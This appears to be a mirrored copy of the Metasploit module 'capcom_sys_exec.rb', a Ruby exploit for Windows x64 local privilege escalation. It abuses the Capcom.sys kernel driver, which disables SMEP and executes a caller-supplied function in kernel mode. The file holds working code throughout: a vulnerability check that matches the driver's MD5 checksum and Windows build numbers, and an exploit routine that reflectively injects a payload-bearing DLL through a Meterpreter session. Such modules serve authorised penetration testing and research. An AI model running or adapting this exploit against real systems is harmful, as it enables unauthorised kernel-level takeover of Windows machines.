Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/local/capcom_sys_exec.rb
Views: 11655
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = NormalRanking78include Msf::Post::File9include Msf::Post::Windows::Priv10include Msf::Post::Windows::Process11include Msf::Post::Windows::ReflectiveDLLInjection12prepend Msf::Exploit::Remote::AutoCheck1314def initialize(info = {})15super(16update_info(17info,18{19'Name' => 'Windows Capcom.sys Kernel Execution Exploit (x64 only)',20'Description' => %q{21This module abuses the Capcom.sys kernel driver's function that allows for an22arbitrary function to be executed in the kernel from user land. This function23purposely disables SMEP prior to invoking a function given by the caller.24This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.25Note that builds after 22000.194 contain deny lists that prevent this driver from loading.26},27'License' => MSF_LICENSE,28'Author' => [29'TheWack0lian', # Issue discovery30'OJ Reeves' # exploit and msf module31],32'Arch' => [ARCH_X64],33'Platform' => 'win',34'SessionTypes' => [ 'meterpreter' ],35'DefaultOptions' => {36'EXITFUNC' => 'thread'37},38'Targets' => [39[ 'Windows x64', { 'Arch' => ARCH_X64 } ]40],41'Payload' => {42'Space' => 4096,43'DisableNops' => true44},45'References' => [46['URL', 'https://twitter.com/TheWack0lian/status/779397840762245124']47],48'DisclosureDate' => '1999-01-01', # non-vuln exploit date49'DefaultTarget' => 0,50'Compat' => {51'Meterpreter' => {52'Commands' => %w[53stdapi_fs_md554stdapi_sys_config_driver_list55]56}57}58}59)60)61end6263def check64return Exploit::CheckCode::Unknown unless session.platform == 'windows'6566version = get_version_info67if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?68return Exploit::CheckCode::Unknown69end7071# These versions of Windows 11 come built in with a driver block list preventing loading of capcom.sys72if version.build_number > Rex::Version.new('10.0.22000.194')73return Exploit::CheckCode::Safe('Target contains a block list which prevents the vulnerable driver from being loaded!')74end7576if sysinfo['Architecture'] != ARCH_X6477return Exploit::CheckCode::Safe78end7980# Validate that the driver has been loaded and that81# the version is the same as the one expected82client.sys.config.getdrivers.each do |d|83next unless d[:basename].downcase == 'capcom.sys'8485expected_checksum = '73c98438ac64a68e88b7b0afd11ba140'86target_checksum = client.fs.file.md5(d[:filename])8788if expected_checksum == Rex::Text.to_hex(target_checksum, '')89return Exploit::CheckCode::Appears90end91end9293return Exploit::CheckCode::Safe94end9596def exploit97if is_system?98fail_with(Failure::None, 'Session is already elevated')99end100101check_result = check102if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown103fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')104end105106if sysinfo['Architecture'] == ARCH_X64107if session.arch == ARCH_X86108fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session')109end110111if target.arch.first == ARCH_X86112fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')113end114end115116encoded_payload = payload.encoded117execute_dll(118::File.join(Msf::Config.data_directory, 'exploits', 'capcom_sys_exec', 'capcom_sys_exec.x64.dll'),119encoded_payload120)121122print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')123end124end125126127